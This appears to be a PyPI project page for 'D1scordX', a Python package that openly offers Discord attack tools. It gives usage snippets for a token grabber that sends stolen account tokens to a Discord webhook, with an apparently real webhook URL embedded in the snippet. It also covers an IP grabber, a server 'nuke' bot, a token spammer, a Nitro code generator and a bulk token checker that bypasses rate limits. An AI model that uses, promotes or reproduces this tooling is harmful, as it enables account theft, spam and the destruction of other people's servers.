Skip to main content

D1scordX AIO Module

Project description

Link:
Discord | YouTube | Github

Setup

Tips:

  • Install module with: pip install D1scordX

Features:

  • CheckTokens | Check a token list from txt file and bypass ratelimit(discord api(not bypassing Cloudflare))
  • TokenGrabber | Grab discord token using webhook
  • IpGrabber | Grab ip and send to discord webhook
  • SelfNukeBot | Nuke discord server with your own account
  • TokenSpammer | Spam message with your valid token
  • GenerateNitro | Generate nitro and save on a txt file
  • NitroSniper | Snipe discord nitro

How to use:

  • CheckTokens
from D1scordX import CheckTokens

useragent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'
CheckTokens('filename.txt',useragent)

#in filename.txt we have token(list)
  • TokenGrabber
from D1scordX import TokenGrabber

webhook = 'https://discord.com/api/webhooks/826913797411045396/M1J0F8t7ngBLqWY1CEK3dDvCY4eN-YYLwhNkNKJj1MZKOKvwDViHgkqKGSa5TRjownWo'
TokenGrabber(webhook)
  • SelfNukeBot
from D1scordX import SelfNukeBot

token = 'token'
prefix = 'bot prefix ex:$'
SelfNukeBot(token,prefix)
  • TokenSpammer
from D1scordX import TokenSpammer

TokenSpammer('my token file.txt',channel id (791225898242015255),message to send,10)
ex:TokenSpammer('tokens.txt',791225898242015255,hello world,10)

#in my token file.txt we have token(list)
  • GenerateNitro
from D1scordX import GenerateNitro

GenerateNitro('outpout file.txt',count of nitro)
ex:GenerateNitro('mynitro.txt',100)
- **IpGrabber**
```py
from D1scordX import IpGrabber

webhook = 'Your Webhhook Url'
IpGrabber(webhook)

- **NitroSniper**
```py
from D1scordX import NitroSniper

token = 'your token'
NitroSniper(token)

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

D1scordX-0.0.9.tar.gz (5.7 kB view hashes)

Uploaded Source

Built Distribution

D1scordX-0.0.9-py3-none-any.whl (6.7 kB view hashes)

Uploaded Python 3

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page